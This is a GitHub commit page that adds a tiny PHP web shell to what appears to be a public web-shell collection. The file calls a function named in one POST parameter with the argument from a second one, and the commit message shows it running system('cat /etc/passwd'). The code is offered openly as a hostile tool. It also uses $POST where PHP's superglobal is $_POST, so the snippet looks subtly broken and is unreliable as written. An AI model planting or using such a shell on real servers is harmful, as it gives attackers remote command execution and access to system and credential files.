Create simple_2022_08_15.php

running : system('cat /etc/passwd')
![img](https://raw.githubusercontent.com/tennc/webshell/master/php/Fig4-web-shell-example-2.png)
This commit is contained in:
tennc 2022-08-15 00:46:41 +08:00 committed by GitHub
parent 95f12107a7
commit 39cf8cacca
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,6 @@
<?php
$_=$POST['1'];
$__=$POST['2'];
// running -> system('cat /etc/passwd');
$_($__);
?>